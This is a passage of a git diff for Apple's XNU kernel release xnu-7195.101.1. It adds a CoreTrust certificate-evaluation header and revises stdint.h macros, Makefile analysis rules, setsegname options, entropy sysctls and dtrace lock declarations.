From: Apple Date: Tue, 27 Apr 2021 01:04:15 +0000 (+0000) Subject: xnu-7195.101.1.tar.gz X-Git-Tag: macos-113^0 X-Git-Url: https://git.saurik.com/apple/xnu.git/commitdiff_plain/c3c9b80d004dbbfdf763edeb97968c6997e3b45b xnu-7195.101.1.tar.gz --- diff --git a/EXTERNAL_HEADERS/corecrypto/cckprng.h b/EXTERNAL_HEADERS/corecrypto/cckprng.h index 79fe22fd3..d50b1d060 100644 --- a/EXTERNAL_HEADERS/corecrypto/cckprng.h +++ b/EXTERNAL_HEADERS/corecrypto/cckprng.h @@ -310,7 +310,6 @@ struct cckprng_funcs { @param seed_nbytes Length of the seed in bytes @param seed Pointer to a high-entropy seed @param nonce_nbytes Length of the nonce in bytes - @param seed Pointer to a single-use nonce @discussion @p max_ngens should be set based on an upper bound of CPUs available on the device. The entropy buffer should be managed outside the PRNG and updated continuously (e.g. by an interrupt handler). The count of samples in the entropy buffer needn't be better than a rough estimate. */ diff --git a/EXTERNAL_HEADERS/coretrust/CTEvaluate.h b/EXTERNAL_HEADERS/coretrust/CTEvaluate.h new file mode 100644 index 000000000..3be1d92e0 --- /dev/null +++ b/EXTERNAL_HEADERS/coretrust/CTEvaluate.h @@ -0,0 +1,215 @@ +// +// CoreTrust.h +// CoreTrust +// +// Copyright © 2017-2020 Apple Inc. All rights reserved. +// + +#ifndef _CORETRUST_EVALUATE_H_ +#define _CORETRUST_EVALUATE_H_ + +#include +#include + +__BEGIN_DECLS + +typedef struct x509_octet_string { + const uint8_t *data; + size_t length; +} CTAsn1Item; + +int CTParseCertificateSet(const uint8_t *der, const uint8_t *der_end, // Input: binary representation of concatenated DER-encoded certs + CTAsn1Item *certStorage, size_t certStorageLen, // Output: An array of certStorageLen CTAsn1Items that will be populated with the + // CTAsn1Item for each parsed cert (in the same order as input) + size_t *numParsedCerts); // Output: number of successfully parsed certs + +int CTEvaluateSavageCerts(const uint8_t *certsData, size_t certsLen, + const uint8_t *rootKeyData, size_t rootKeyLen, + const uint8_t **leafKeyData, size_t *leafKeyLen, + bool *isProdCert); + +int CTEvaluateSavageCertsWithUID(const uint8_t *certsData, size_t certsLen, + const uint8_t *rootKeyData, size_t rootKeyLen, + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + uint8_t *UIDData, size_t UIDLen, // Output: a pre-allocated buffer of UIDLen + bool *isProdCert); + +int CTEvaluateYonkersCerts(const uint8_t *certsData, size_t certsLen, + const uint8_t *rootKeyData, size_t rootKeyLen, + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + uint8_t *UIDData, size_t UIDLen, // Output: a pre-allocated buffer of UIDLen + bool *isProdCert); + +int CTEvaluateAcrt(const uint8_t *certsData, size_t certsLen, // Input: binary representation of at most 3 concatenated certs + // with leaf first (root may be omitted) + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData + +int CTEvaluateUcrt(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData) + +int CTEvaluateUcrtTestRoot(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t *rootKeyData, size_t rootKeyLen, // Input: Root public key, if not specified production root will be used + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData) + +int CTEvaluateBAASystem(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData + +typedef struct baa_identity { + uint32_t chipId; + uint64_t ecid; + bool productionStatus; + bool securityMode; + uint8_t securityDomain; + CTAsn1Item img4; +} CTBAAIdentity; + +int CTEvaluateBAASystemWithId(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + CTBAAIdentity *identity); // Output from identity field in leaf certificate + +int CTEvaluateBAASystemTestRoot(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t *rootKeyData, size_t rootKeyLen, // Input: Root public key, if not specified production root will be used + const uint8_t **leafKeyData, size_t *leafKeyLen,// Output: points to the leaf key data in the input certsData + CTBAAIdentity *identity); // Output from identity field in leaf certificate + +int CTEvaluateBAAUser(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + CTBAAIdentity *identity); // Output from identity field in leaf certificate + +int CTEvaluateBAAUserTestRoot(const uint8_t *certsData, size_t certsLen, // Input: binary representation of exactly 3 concatenated + // DER-encoded certs, with leaf first + const uint8_t *rootKeyData, size_t rootKeyLen, // Input: Root public key, if not specified production root will be used + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData + CTBAAIdentity *identity); // Output from identity field in leaf certificate + +int CTEvaluateSatori(const uint8_t *certsData, size_t certsLen, // Input: binary (DER) representation of 3 concatenated certs + // with leaf first + bool allowTestRoot, // Input: whether to allow the Test Apple Roots + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to the leaf key data in the input certsData + +int CTEvaluatePragueSignatureCMS(const uint8_t *cmsData, size_t cmsLen, // Input: CMS signature blob + const uint8_t *detachedData, size_t detachedDataLen, // Input: data signed by CMS blob + bool allowTestRoot, // Input: permit use of test hierarchy + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to leaf key data in input cmsData + +int CTEvaluateKDLSignatureCMS(const uint8_t *cmsData, size_t cmsLen, // Input: CMS signature blob + const uint8_t *detachedData, size_t detachedDataLen, // Input: data signed by CMS blob + bool allowTestRoot, // Input: permit use of test hierarchy + const uint8_t **leafKeyData, size_t *leafKeyLen); // Output: points to leaf key data in input cmsData + +typedef uint64_t CoreTrustPolicyFlags; +enum { + CORETRUST_POLICY_BASIC = 0, + CORETRUST_POLICY_SAVAGE_DEV = 1 << 0, + CORETRUST_POLICY_SAVAGE_PROD = 1 << 1, + CORETRUST_POLICY_MFI_AUTHV3 = 1 << 2, + CORETRUST_POLICY_MAC_PLATFORM = 1 << 3, + CORETRUST_POLICY_MAC_DEVELOPER = 1 << 4, + CORETRUST_POLICY_DEVELOPER_ID = 1 << 5, + CORETRUST_POLICY_MAC_APP_STORE = 1 << 6, + CORETRUST_POLICY_IPHONE_DEVELOPER = 1 << 7, + CORETRUST_POLICY_IPHONE_APP_PROD = 1 << 8, + CORETRUST_POLICY_IPHONE_APP_DEV = 1 << 9, + CORETRUST_POLICY_IPHONE_VPN_PROD = 1 << 10, + CORETRUST_POLICY_IPHONE_VPN_DEV = 1 << 11, + CORETRUST_POLICY_TVOS_APP_PROD = 1 << 12, + CORETRUST_POLICY_TVOS_APP_DEV = 1 << 13, + CORETRUST_POLICY_TEST_FLIGHT_PROD = 1 << 14, + CORETRUST_POLICY_TEST_FLIGHT_DEV = 1 << 15, + CORETRUST_POLICY_IPHONE_DISTRIBUTION = 1 << 16, + CORETRUST_POLICY_MAC_SUBMISSION = 1 << 17, + CORETRUST_POLICY_YONKERS_DEV = 1 << 18, + CORETRUST_POLICY_YONKERS_PROD = 1 << 19, + CORETRUST_POLICY_MAC_PLATFORM_G2 = 1 << 20, + CORETRUST_POLICY_ACRT = 1 << 21, + CORETRUST_POLICY_SATORI = 1 << 22, + CORETRUST_POLICY_BAA = 1 << 23, + CORETRUST_POLICY_UCRT = 1 << 24, + CORETRUST_POLICY_PRAGUE = 1 << 25, + CORETRUST_POLICY_KDL = 1 << 26, + CORETRUST_POLICY_MFI_AUTHV2 = 1 << 27, + CORETRUST_POLICY_MFI_SW_AUTH_PROD = 1 << 28, + CORETRUST_POLICY_MFI_SW_AUTH_DEV = 1 << 29, + CORETRUST_POLICY_COMPONENT = 1 << 30, + CORETRUST_POLICY_IMG4 = 1ULL << 31, + CORETRUST_POLICY_SERVER_AUTH = 1ULL << 32, + CORETRUST_POLICY_SERVER_AUTH_STRING = 1ULL << 33, +}; + +typedef uint32_t CoreTrustDigestType; +enum { + CORETRUST_DIGEST_TYPE_SHA1 = 1, + CORETRUST_DIGEST_TYPE_SHA224 = 2, + CORETRUST_DIGEST_TYPE_SHA256 = 4, + CORETRUST_DIGEST_TYPE_SHA384 = 8, + CORETRUST_DIGEST_TYPE_SHA512 = 16 +}; + +int CTEvaluateAMFICodeSignatureCMS(const uint8_t *cmsData, size_t cmsLen, // Input: CMS blob + const uint8_t *detachedData, size_t detachedDataLen, // Input: data signed by CMS blob + bool allow_test_hierarchy, // Input: permit use of test hierarchy + const uint8_t **leafCert, size_t *leafCertLen, // Output: signing certificate + CoreTrustPolicyFlags *policyFlags, // Output: policy met by signing certificate + CoreTrustDigestType *cmsDigestType, // Output: digest used to sign the CMS blob + CoreTrustDigestType *hashAgilityDigestType, // Output: highest stregth digest type + // from hash agility attribute + const uint8_t **digestData, size_t *digestLen); // Output: pointer to hash agility value + // in CMS blob (with digest type above) +/* Returns non-zero if there's a standards-based problem with the CMS or certificates. + * Policy matching of the certificates is only reflected in the policyFlags output. Namely, if the only problem is that + * the certificates don't match a policy, the returned integer will be 0 (success) and the policyFlags will be 0 (no matching policies). + * Some notes about hash agility outputs: + * - hashAgilityDigestType is only non-zero for HashAgilityV2 + * - If hashAgilityDigestType is non-zero, digestData/Len provides the digest value + * - If hashAgilityDigestType is zero, digestData/Len provides the content of the HashAgilityV1 attribute (if present) + * - If neither HashAgilityV1 nor HashAgilityV2 attributes are found, these outputs will all be NULL. + */ + +int CTParseAccessoryCerts(const uint8_t *certsData, size_t certsLen, // Input: CMS or binary representation of DER-encoded certs + const uint8_t **leafCertData, size_t *leafCertLen, // Output: points to leaf cert data in input certsData + const uint8_t **subCACertData, size_t *subCACertLen, // Output: points to subCA cert data (1st of 2) in input certsData, if present. Is set to NULL if only one cert present in input. + CoreTrustPolicyFlags *flags); // Output: policy flags set by this leaf + + +int CTEvaluateAccessoryCert(const uint8_t *leafCertData, size_t leafCertLen, // Input: binary representation of DER-encoded leaf cert + const uint8_t *subCACertData, size_t subCACertLen, // Input: (optional) binary representation of DER-encoded subCA cert + const uint8_t *anchorCertData, size_t anchorCertLen, // Input: binary representation of DER-encoded anchor cert + CoreTrustPolicyFlags policy, // Input: policy to use when evaluating chain + const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input leafCertData + const uint8_t **extensionValueData, size_t *extensionValueLen); // Output: points to the extension value in the input leafCertData +/* Which extension value is returned is based on which policy the cert was verified against: + * - For MFI AuthV3, this is the value of the extension with OID 1.2.840.113635.100.6.36 + * - For SW Auth, this is the value of the extension with OID 1.2.840.113635.100.6.59.1 (GeneralCapabilities extension) + * - For Component certs, this si the value of the extension with OID 1.2.840.113635.100.11.1 (Component Type) + * + * The following CoreTrustPolicyFlags are accepted: + * - CORETRUST_POLICY_BASIC + * - CORETRUST_POLICY_MFI_AUTHV2 + * - CORETRUST_POLICY_MFI_AUTHV3 + * - CORETRUST_POLICY_MFI_SW_AUTH_DEV + * - CORETRUST_POLICY_MFI_SW_AUTH_PROD + * - CORETRUST_POLICY_COMPONENT + */ + +int CTEvaluateAppleSSL(const uint8_t *certsData, size_t certsLen, // Input: binary representation of up to 3 concatenated + // DER-encoded certificates, with leaf first + const uint8_t *hostnameData, size_t hostnameLen, // Input: The hostname of the TLS server being connected to + uint64_t leafMarker, // Input: The last decimal of the marker OID for this project + // (e.g. 32 for 1.2.840.113635.100.6.27.32 + bool allowTestRoots); // Input: permit use of test hierarchy + +int CTEvaluateAppleSSLWithOptionalTemporalCheck(const uint8_t *certsData, size_t certsLen, + const uint8_t *hostnameData, size_t hostnameLen, + uint64_t leafMarker, + bool allowTestRoots, + bool checkTemporalValidity); + +__END_DECLS + +#endif /* _CORETRUST_EVALUATE_H_ */ diff --git a/EXTERNAL_HEADERS/stdint.h b/EXTERNAL_HEADERS/stdint.h index 9d86e8a62..19ac69fb0 100644 --- a/EXTERNAL_HEADERS/stdint.h +++ b/EXTERNAL_HEADERS/stdint.h @@ -60,12 +60,51 @@ typedef uint64_t uint_fast64_t; /* 7.18.1.5 Greatest-width integer types */ -typedef long long intmax_t; -typedef unsigned long long uintmax_t; +#ifdef __INTMAX_TYPE__ +typedef __INTMAX_TYPE__ intmax_t; +#else +#ifdef __LP64__ +typedef long int intmax_t; +#else +typedef long long int intmax_t; +#endif /* __LP64__ */ +#endif /* __INTMAX_TYPE__ */ +#ifdef __UINTMAX_TYPE__ +typedef __UINTMAX_TYPE__ uintmax_t; +#else +#ifdef __LP64__ +typedef long unsigned int uintmax_t; +#else +typedef long long unsigned int uintmax_t; +#endif /* __LP64__ */ +#endif /* __UINTMAX_TYPE__ */ + +/* 7.18.4 Macros for integer constants */ +#define INT8_C(v) (v) +#define INT16_C(v) (v) +#define INT32_C(v) (v) +#define INT64_C(v) (v ## LL) + +#define UINT8_C(v) (v) +#define UINT16_C(v) (v) +#define UINT32_C(v) (v ## U) +#define UINT64_C(v) (v ## ULL) + +#ifdef __LP64__ +#define INTMAX_C(v) (v ## L) +#define UINTMAX_C(v) (v ## UL) +#else +#define INTMAX_C(v) (v ## LL) +#define UINTMAX_C(v) (v ## ULL) +#endif /* 7.18.2 Limits of specified-width integer types: * These #defines specify the minimum and maximum limits * of each of the types declared above. + * + * They must have "the same type as would an expression that is an + * object of the corresponding type converted according to the integer + * promotion". */ @@ -126,43 +165,33 @@ typedef unsigned long long uintmax_t; /* 7.18.2.4 Limits of integer types capable of holding object pointers */ #if __WORDSIZE == 64 -#define INTPTR_MIN INT64_MIN -#define INTPTR_MAX INT64_MAX +#define INTPTR_MAX 9223372036854775807L #else -#define INTPTR_MIN INT32_MIN -#define INTPTR_MAX INT32_MAX +#define INTPTR_MAX 2147483647L #endif +#define INTPTR_MIN (-INTPTR_MAX-1) #if __WORDSIZE == 64 -#define UINTPTR_MAX UINT64_MAX +#define UINTPTR_MAX 18446744073709551615UL #else -#define UINTPTR_MAX UINT32_MAX +#define UINTPTR_MAX 4294967295UL #endif /* 7.18.2.5 Limits of greatest-width integer types */ -#define INTMAX_MIN INT64_MIN -#define INTMAX_MAX INT64_MAX - -#define UINTMAX_MAX UINT64_MAX +#define INTMAX_MAX INTMAX_C(9223372036854775807) +#define UINTMAX_MAX UINTMAX_C(18446744073709551615) +#define INTMAX_MIN (-INTMAX_MAX-1) /* 7.18.3 "Other" */ #if __WORDSIZE == 64 -#define PTRDIFF_MIN INT64_MIN -#define PTRDIFF_MAX INT64_MAX +#define PTRDIFF_MIN INTMAX_MIN +#define PTRDIFF_MAX INTMAX_MAX #else #define PTRDIFF_MIN INT32_MIN #define PTRDIFF_MAX INT32_MAX #endif -/* We have no sig_atomic_t yet, so no SIG_ATOMIC_{MIN,MAX}. - Should end up being {-127,127} or {0,255} ... or bigger. - My bet would be on one of {U}INT32_{MIN,MAX}. */ - -#if __WORDSIZE == 64 -#define SIZE_MAX UINT64_MAX -#else -#define SIZE_MAX UINT32_MAX -#endif +#define SIZE_MAX UINTPTR_MAX #if defined(__STDC_WANT_LIB_EXT1__) && __STDC_WANT_LIB_EXT1__ >= 1 #define RSIZE_MAX (SIZE_MAX >> 1) @@ -194,20 +223,6 @@ typedef unsigned long long uintmax_t; #define SIG_ATOMIC_MIN INT32_MIN #define SIG_ATOMIC_MAX INT32_MAX -/* 7.18.4 Macros for integer constants */ -#define INT8_C(v) (v) -#define INT16_C(v) (v) -#define INT32_C(v) (v) -#define INT64_C(v) (v ## LL) - -#define UINT8_C(v) (v ## U) -#define UINT16_C(v) (v ## U) -#define UINT32_C(v) (v ## U) -#define UINT64_C(v) (v ## ULL) - -#define INTMAX_C(v) (v ## LL) -#define UINTMAX_C(v) (v ## ULL) - #endif /* KERNEL */ #endif /* _KERNEL_STDINT_H_ */ diff --git a/Makefile b/Makefile index 8b1e30f65..9b62aadb1 100644 --- a/Makefile +++ b/Makefile @@ -318,6 +318,8 @@ xnu_tests_driverkit: SRCROOT=$(SRCROOT)/tests/driverkit +include $(MakeInc_cmd) + # # The "analyze" target defined below invokes Clang Static Analyzer # with a predefined set of checks and options for the project. @@ -339,16 +341,18 @@ STATIC_ANALYZER_TARGET ?= STATIC_ANALYZER_EXTRA_FLAGS ?= analyze: - # This is where the reports are going to be available. - # Old reports are deleted on make clean only. - mkdir -p $(STATIC_ANALYZER_OUTPUT_DIR) - - # Recursively build the requested target under scan-build. - # Exclude checks that weren't deemed to be security critical, - # like null pointer dereferences. - xcrun scan-build -o $(STATIC_ANALYZER_OUTPUT_DIR) \ +# This is where the reports are going to be available. +# Old reports are deleted on make clean only. + $(_v)$(MKDIR) $(STATIC_ANALYZER_OUTPUT_DIR) + +# Recursively build the requested target under scan-build. +# Exclude checks that weren't deemed to be security critical, +# like null pointer dereferences. + $(_v)$(XCRUN) $(SCAN_BUILD) -o $(STATIC_ANALYZER_OUTPUT_DIR) \ -disable-checker deadcode.DeadStores \ -disable-checker core.NullDereference \ -disable-checker core.DivideZero \ $(STATIC_ANALYZER_EXTRA_FLAGS) \ - make $(STATIC_ANALYZER_TARGET) + $(MAKE) $(STATIC_ANALYZER_TARGET) QUIET=1 2>&1 | $(GREP) "^scan-build:" + +.PHONY: analyze diff --git a/SETUP/setsegname/setsegname.c b/SETUP/setsegname/setsegname.c index bd15b0025..a0d5d3bc3 100644 --- a/SETUP/setsegname/setsegname.c +++ b/SETUP/setsegname/setsegname.c @@ -107,7 +107,7 @@ readFile(const char *path, vm_offset_t * objAddr, vm_size_t * objSize) static void usage(void) { - fprintf(stderr, "Usage: %s [-s OLDSEGNAME] -n NEWSEGNAME input -o output\n", getprogname()); + fprintf(stderr, "Usage: %s [-s OLDSEGNAME] [-i IGNORESEGNAME] -n NEWSEGNAME input -o output\n", getprogname()); exit(1); } @@ -120,6 +120,7 @@ main(int argc, char * argv[]) const char * output_name = NULL; const char * input_name = NULL; const char * oldseg_name = NULL; + const char * ignoreseg_name = NULL; const char * newseg_name = NULL; struct mach_header * hdr; struct mach_header_64 * hdr64; @@ -137,11 +138,14 @@ main(int argc, char * argv[]) int ch; - while ((ch = getopt(argc, argv, "s:n:o:")) != -1) { + while ((ch = getopt(argc, argv, "s:i:n:o:")) != -1) { switch (ch) { case 's': oldseg_name = optarg; break; + case 'i': + ignoreseg_name = optarg; + break; case 'n': newseg_name = optarg; break; @@ -234,7 +238,8 @@ main(int argc, char * argv[]) attr = OSSwapInt32(attr); } - if (!(S_ATTR_DEBUG & attr)) { + if (!(S_ATTR_DEBUG & attr) && (!ignoreseg_name || + 0 != strncmp(ignoreseg_name, (char *)names, sizeof(*names)))) { if (!oldseg_name || 0 == strncmp(oldseg_name, (char *)names, sizeof(*names))) { memset(names, 0x0, sizeof(*names)); diff --git a/bsd/arm/vmparam.h b/bsd/arm/vmparam.h index 085f13968..ce69fd9cd 100644 --- a/bsd/arm/vmparam.h +++ b/bsd/arm/vmparam.h @@ -26,7 +26,7 @@ #ifndef DFLSSIZ /* XXX stack size default is a platform property: use getrlimit(2) */ #if (defined(TARGET_OS_OSX) && (TARGET_OS_OSX != 0)) || \ - (defined(KERNEL) && !defined(CONFIG_EMBEDDED) || (CONFIG_EMBEDDED == 0)) + (defined(KERNEL) && XNU_TARGET_OS_OSX) #define DFLSSIZ (8*1024*1024 - 16*1024) #else #define DFLSSIZ (1024*1024 - 16*1024) /* initial stack size limit */ @@ -35,7 +35,7 @@ #ifndef MAXSSIZ /* XXX stack size limit is a platform property: use getrlimit(2) */ #if (defined(TARGET_OS_OSX) && (TARGET_OS_OSX != 0)) || \ - (defined(KERNEL) && !defined(CONFIG_EMBEDDED) || (CONFIG_EMBEDDED == 0)) + (defined(KERNEL) && XNU_TARGET_OS_OSX) #define MAXSSIZ (64*1024*1024) /* max stack size */ #else #define MAXSSIZ (1024*1024) /* max stack size */ diff --git a/bsd/conf/files b/bsd/conf/files index f151c7312..7971787ee 100644 --- a/bsd/conf/files +++ b/bsd/conf/files @@ -167,6 +167,7 @@ bsd/vfs/vfs_conf.c standard bsd/vfs/vfs_conf.c optional config_nfs4 bsd/vfs/vfs_fslog.c standard bsd/vfs/vfs_init.c standard +bsd/vfs/vfs_io_compression_stats.c optional config_io_compression_stats bsd/vfs/vfs_lookup.c standard bsd/vfs/vfs_quota.c optional quota bsd/vfs/vfs_subr.c standard @@ -457,6 +458,7 @@ bsd/kern/subr_log.c standard bsd/kern/subr_prf.c standard bsd/kern/subr_sbuf.c standard bsd/kern/subr_xxx.c standard +bsd/kern/counter_test.c optional development bsd/kern/sys_eventlink.c standard bsd/kern/sys_generic.c standard bsd/kern/sys_pipe.c standard diff --git a/bsd/crypto/entropy/Makefile b/bsd/crypto/entropy/Makefile index 2d1197ce7..2ff49f54b 100644 --- a/bsd/crypto/entropy/Makefile +++ b/bsd/crypto/entropy/Makefile @@ -6,9 +6,6 @@ export MakeInc_dir=${SRCROOT}/makedefs/MakeInc.dir include $(MakeInc_cmd) include $(MakeInc_def) -DATAFILES = \ - entropy_sysctl.h - INSTALL_MI_LIST = EXPORT_MI_LIST = ${DATAFILES} diff --git a/bsd/crypto/entropy/entropy_sysctl.c b/bsd/crypto/entropy/entropy_sysctl.c index 39502f7b9..73580d77b 100644 --- a/bsd/crypto/entropy/entropy_sysctl.c +++ b/bsd/crypto/entropy/entropy_sysctl.c @@ -27,9 +27,9 @@ */ #include +#include #include #include -#include #include #include @@ -49,7 +49,7 @@ SYSCTL_UINT(_kern_entropy_health_adaptive_proportion_test, OID_AUTO, failure_cou SYSCTL_UINT(_kern_entropy_health_adaptive_proportion_test, OID_AUTO, max_observation_count, CTLFLAG_RD, &entropy_health_apt_stats.max_observation_count, 0, NULL); static int -sysctl_entropy_collect(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req) +sysctl_entropy_collect SYSCTL_HANDLER_ARGS { if (!req->oldptr || req->oldlen > entropy_analysis_buffer_size) { return EINVAL; @@ -61,11 +61,21 @@ sysctl_entropy_collect(__unused struct sysctl_oid *oidp, __unused void *arg1, __ // Get current size of entropy buffer in bytes SYSCTL_UINT(_kern_entropy, OID_AUTO, entropy_buffer_size, CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, &entropy_analysis_buffer_size, 0, NULL); // Collect contents from entropy buffer -SYSCTL_PROC(_kern_entropy, OID_AUTO, entropy_collect, CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, NULL, 0, sysctl_entropy_collect, "-", NULL); +SYSCTL_PROC(_kern_entropy, OID_AUTO, entropy_collect, + CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_NOAUTO, + NULL, 0, sysctl_entropy_collect, "-", NULL); -void -entropy_analysis_register_sysctls(void) +__startup_func +static void +entropy_analysis_sysctl_startup(void) { - sysctl_register_oid(&sysctl__kern_entropy_entropy_buffer_size); - sysctl_register_oid(&sysctl__kern_entropy_entropy_collect); + uint32_t sample_count = 0; + if (__improbable(PE_parse_boot_argn("entropy-analysis-sample-count", &sample_count, sizeof(sample_count)))) { + sysctl_register_oid_early(&sysctl__kern_entropy_entropy_buffer_size); + sysctl_register_oid_early(&sysctl__kern_entropy_entropy_collect); + } else if (__improbable(PE_parse_boot_argn("ebsz", &sample_count, sizeof(sample_count)))) { + sysctl_register_oid_early(&sysctl__kern_entropy_entropy_buffer_size); + sysctl_register_oid_early(&sysctl__kern_entropy_entropy_collect); + } } +STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, entropy_analysis_sysctl_startup); diff --git a/bsd/crypto/entropy/entropy_sysctl.h b/bsd/crypto/entropy/entropy_sysctl.h deleted file mode 100644 index 4e957fb9b..000000000 --- a/bsd/crypto/entropy/entropy_sysctl.h +++ /dev/null @@ -1,42 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ - -#ifndef _SYS_CRYPTO_ENTROPY_ENTROPYSYSCTL_H_ -#define _SYS_CRYPTO_ENTROPY_ENTROPYSYSCTL_H_ - -// This function is used only for test purposes. We collect a large -// number of entropy samples during boot and analyze them offline. -// -// See entropy.c to understand the initialization of this module via -// boot arg and the collection of the samples. -// -// See entropy_sysctl.c to understand the semantics of the sysctl -// that exposes the samples for analysis. -void entropy_analysis_register_sysctls(void); - -#endif diff --git a/bsd/dev/arm/dtrace_isa.c b/bsd/dev/arm/dtrace_isa.c index c77f08a64..0802551bc 100644 --- a/bsd/dev/arm/dtrace_isa.c +++ b/bsd/dev/arm/dtrace_isa.c @@ -55,9 +55,6 @@ extern struct arm_saved_state *find_kern_regs(thread_t); extern dtrace_id_t dtrace_probeid_error; /* special ERROR probe */ typedef arm_saved_state_t savearea_t; -extern lck_attr_t *dtrace_lck_attr; -extern lck_grp_t *dtrace_lck_grp; - int dtrace_arm_condition_true(int condition, int cpsr); /* @@ -94,7 +91,7 @@ dtrace_getipl(void) * MP coordination */ -decl_lck_mtx_data(static, dt_xc_lock); +static LCK_MTX_DECLARE_ATTR(dt_xc_lock, &dtrace_lck_grp, &dtrace_lck_attr); static uint32_t dt_xc_sync; typedef struct xcArg { @@ -138,16 +135,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg) return; } -/* - * Initialization - */ -void -dtrace_isa_init(void) -{ - lck_mtx_init(&dt_xc_lock, dtrace_lck_grp, dtrace_lck_attr); - return; -} - /* * Runtime and ABI */ diff --git a/bsd/dev/arm/munge.c b/bsd/dev/arm/munge.c index af050d7ee..fe18d66cc 100644 --- a/bsd/dev/arm/munge.c +++ b/bsd/dev/arm/munge.c @@ -64,7 +64,7 @@ typedef enum { /* * We start 32 bytes after sp since 4 registers are pushed onto the stack - * in the userspace syscall handler, and the first 4 stack argumnets are moved + * in the userspace syscall handler, and the first 4 stack arguments are moved * into registers already */ #define ARG_SP_BYTE_OFFSET 32 diff --git a/bsd/dev/arm/stubs.c b/bsd/dev/arm/stubs.c index 7675bb322..bf61083c2 100644 --- a/bsd/dev/arm/stubs.c +++ b/bsd/dev/arm/stubs.c @@ -16,11 +16,13 @@ #include #include #include +#include #include #include #include #include + /* * copy a null terminated string from the kernel address space into the user * address space. - if the user is denied write access, return EFAULT. - if @@ -90,3 +92,4 @@ copywithin(void *src, void *dst, size_t count) bcopy(src, dst, count); return 0; } + diff --git a/bsd/dev/arm64/dtrace_isa.c b/bsd/dev/arm64/dtrace_isa.c index 494bb7fad..39d6988f9 100644 --- a/bsd/dev/arm64/dtrace_isa.c +++ b/bsd/dev/arm64/dtrace_isa.c @@ -52,9 +52,6 @@ extern struct arm_saved_state *find_kern_regs(thread_t); extern dtrace_id_t dtrace_probeid_error; /* special ERROR probe */ typedef arm_saved_state_t savearea_t; -extern lck_attr_t *dtrace_lck_attr; -extern lck_grp_t *dtrace_lck_grp; - #if XNU_MONITOR extern void * pmap_stacks_start; extern void * pmap_stacks_end; @@ -99,7 +96,7 @@ dtrace_getipl(void) * MP coordination */ -decl_lck_mtx_data(static, dt_xc_lock); +static LCK_MTX_DECLARE_ATTR(dt_xc_lock, &dtrace_lck_grp, &dtrace_lck_attr); static uint32_t dt_xc_sync; typedef struct xcArg { @@ -143,16 +140,6 @@ dtrace_xcall(processorid_t cpu, dtrace_xcall_t f, void *arg) return; } -/* - * Initialization - */ -void -dtrace_isa_init(void) -{ - lck_mtx_init(&dt_xc_lock, dtrace_lck_grp, dtrace_lck_attr); - return; -} - /** * Register definitions diff --git a/bsd/dev/dtrace/dtrace.c b/bsd/dev/dtrace/dtrace.c index 36d4f8223..af303e6f4 100644 --- a/bsd/dev/dtrace/dtrace.c +++ b/bsd/dev/dtrace/dtrace.c @@ -309,10 +309,14 @@ static int dtrace_module_unloaded(struct kmod_info *kmod); * LCK_MTX_ASSERT(&cpu_lock, LCK_MTX_ASSERT_OWNED); * */ -static lck_mtx_t dtrace_lock; /* probe state lock */ -static lck_mtx_t dtrace_provider_lock; /* provider state lock */ -static lck_mtx_t dtrace_meta_lock; /* meta-provider state lock */ -static lck_rw_t dtrace_dof_mode_lock; /* dof mode lock */ +static LCK_MTX_DECLARE_ATTR(dtrace_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* probe state lock */ +static LCK_MTX_DECLARE_ATTR(dtrace_provider_lock, + &dtrace_lck_grp, &dtrace_lck_attr); /* provider state lock */ +static 